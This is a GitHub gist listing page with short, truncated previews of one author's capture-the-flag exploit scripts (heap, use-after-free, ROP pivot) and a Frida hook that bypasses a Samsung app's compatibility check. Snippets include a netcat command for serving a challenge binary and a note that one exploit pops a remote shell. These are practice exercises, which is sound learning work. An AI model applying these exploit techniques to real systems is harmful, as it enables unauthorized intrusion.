alberto__segura segura2010
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| def create(size, content=None): | |
| s.send("1\n") | |
| s.recvuntil("Choose the size of prison heap") | |
| s.send("{}\n".format(size)) | |
| s.recvuntil("Enter the name of the person who is going to enter the prison") | |
| #sleep(0.5) | |
| s.send("{}\n".format(content)) |
segura2010
/ exploit.py
Last active
December 8, 2019 12:59
MalwareTech Use-After-Free challenge exploit (https://www.malwaretech.com/windows-exploit-challenges/user-after-free-1-0)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import threading | |
| from pwn import * | |
| from socket import * | |
| import struct | |
| from telnetlib import Telnet | |
| class ChatClient: | |
| def __init__(self, server): |
segura2010
/ exploit.py
Created
September 13, 2019 18:49
BFS Ekoparty Exploitation Challenge 2019 - https://labs.bluefrostsecurity.de/blog/2019/09/07/bfs-ekoparty-2019-exploitation-challenge/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| IP = 'localhost' | |
| PORT = 54321 | |
| s = None | |
| def send_msg(msg, size): | |
| s = remote(IP, PORT) | |
| COOKIE = "Eko2019\x00" | |
| s.send(COOKIE + pack(size, 64, 'little', True)) |
segura2010
/ pokedex_nn8ed.py
Last active
October 8, 2018 15:22
Solution for the Pokedex challenge NN8ed CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding=utf-8 | |
| # Writeup: https://elladodelnovato.blogspot.com/2018/10/ctf-nn8ed-navaja-negra-pokedex.html | |
| from pwn import * | |
| env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.27.so")} | |
| s = process("./pokedex_nn2k18", env=env) | |
| #s = remote('challenges.ka0labs.org', 1341) |
segura2010
/ TUCTF2017_Temple_PWN.py
Last active
November 27, 2017 17:18
My Solution for the temple challenge of the TUCTF 2017 (https://tuctf.asciioverflow.com/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| ''' | |
| TUCTF 2017 - https://tuctf.asciioverflow.com/ | |
| temple (500 points) - PWN | |
| -------------------------------------------------------- | |
| (Small)Explanation at the end of the file. | |
| -------------------------------------------------------- | |
| ''' |
segura2010
/ ROPEmporium_Pivot.py
Last active
September 2, 2017 09:45
Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html) | |
| It pops a remote shell. | |
| Run the binary with: nc -lvc ./pivot -p 4444 | |
| Then, run this exploit :) | |
| ''' |
segura2010
/ hack1t_pwn200.py
Last active
August 28, 2017 16:48
Solution to pwn200 task of hack1t 2017 CTF :) (I wanted to practice ROP, so I did it opening and reading the flag file to finally write it to stdout and exit)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| from struct import pack | |
| def p(x): | |
| return pack('<L', x) | |
| s = socket.socket( | |
| socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect(("165.227.98.55", 3333)) |
segura2010
/ frida_samsung_manager
Created
September 12, 2016 10:25
Frida script to force compatibility of Samsung Manager app in Android
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Java.perform(function () { | |
| // Function to hook is defined here | |
| var HostManagerUtils = Java.use('com.samsung.android.app.twatchmanager.util.HostManagerUtils'); | |
| HostManagerUtils.isSupportedInHostDevice.implementation = function (p1) { | |
| var result = this.isSupportedInHostDevice(p1); | |
| console.log("isSupportedInHostDevice return: " + result); |